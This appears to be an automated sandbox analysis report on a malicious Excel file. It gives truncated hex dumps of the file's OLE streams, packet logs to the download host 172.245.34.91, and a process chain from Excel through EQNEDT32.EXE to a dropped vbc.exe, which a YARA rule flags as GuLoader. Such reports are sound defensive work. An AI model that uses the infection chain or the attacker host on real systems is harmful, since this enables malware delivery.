      Stream Path: MBD017EF322/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:524
      Entropy:5.18268582383174
      Base64 Encoded:True
      Data ASCII:I D = " { E 6 0 3 B E 4 9 - 3 B E 4 - 4 9 D 7 - 9 5 7 C - E 1 6 A B 7 6 4 E 9 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F E F C F 8 9 E 0 8 A 6 A 0 A A A
      Data Raw:49 44 3d 22 7b 45 36 30 33 42 45 34 39 2d 33 42 45 34 2d 34 39 44 37 2d 39 35 37 43 2d 45 31 36 41 42 37 36 34 45 39 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
      Stream Path: MBD017EF322/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:104
      Entropy:3.0488640812019017
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
      Stream Path: MBD017EF322/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2615
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:2615
      Entropy:3.966034925838034
      Base64 Encoded:False
      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
      Data Raw:cc 61 85 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      Stream Path: MBD017EF322/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:553
      Entropy:6.393413723460345
      Base64 Encoded:True
      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc bb 86 65 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
      Stream Path: MBD017EF323/\x1CompObj, File Type: data, Stream Size: 114
      General
      Stream Path:MBD017EF323/\x1CompObj
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF323/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:MBD017EF323/\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: MBD017EF323/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327", Stream Size: 120200
      General
      Stream Path:MBD017EF323/\x5SummaryInformation
      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
      Stream Size:120200
      Entropy:4.560400140271791
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00
      Stream Path: MBD017EF323/MBD017ED236/\x1CompObj, File Type: data, Stream Size: 99
      General
      Stream Path:MBD017EF323/MBD017ED236/\x1CompObj
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF323/MBD017ED236/Package, File Type: Microsoft Excel 2007+, Stream Size: 7880
      General
      Stream Path:MBD017EF323/MBD017ED236/Package
      File Type:Microsoft Excel 2007+
      Stream Size:7880
      Entropy:6.5489983015138815
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: MBD017EF323/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 151951
      General
      Stream Path:MBD017EF323/Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:151951
      Entropy:7.6835052184911135
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
      Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 29, 2022 08:13:05.353737116 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.475182056 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.475337982 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.476435900 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.603394032 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603449106 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603480101 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603504896 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603518009 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.603530884 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603550911 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.603557110 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603560925 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.603580952 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.603585005 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603604078 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.603611946 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603638887 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603666067 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.603737116 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.616553068 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.724899054 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.724945068 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.724972010 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.724997997 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725025892 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725059986 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725080013 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725087881 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725087881 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725099087 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725119114 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725126982 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725126982 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725140095 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725147009 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725158930 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725177050 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725186110 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725204945 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725205898 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725219011 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725231886 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725249052 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725260019 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725286961 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725311995 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725338936 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725342035 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725342035 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725363970 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725342035 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725392103 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.725393057 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725393057 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725429058 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.725440979 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.726560116 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847157955 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847219944 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847260952 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847296000 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847332001 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847367048 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847400904 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847434998 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847464085 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847466946 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847464085 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847500086 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847515106 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847531080 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847532034 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847558975 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847564936 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847580910 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847582102 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847601891 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847629070 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847657919 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847687006 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847687006 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847702980 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847719908 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847731113 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847749949 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847762108 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847774982 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847790003 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847795963 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847807884 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847819090 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847841978 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847865105 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847867012 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847891092 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847896099 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847913027 CET4917380192.168.2.22172.245.34.91
      Nov 29, 2022 08:13:05.847913980 CET8049173172.245.34.91192.168.2.22
      Nov 29, 2022 08:13:05.847929001 CET4917380192.168.2.22172.245.34.91

      HTTP Request Dependency Graph

      • 172.245.34.91

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:08:12:24
      Start date:29/11/2022
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13f8d0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:2
      Start time:08:12:45
      Start date:29/11/2022
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:5
      Start time:08:12:50
      Start date:29/11/2022
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\Public\vbc.exe"
      Imagebase:0x400000
      File size:477800 bytes
      MD5 hash:7081C4822CF1C7572DD82822B8F27C49
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
      Reputation:low

      Disassembly

      No disassembly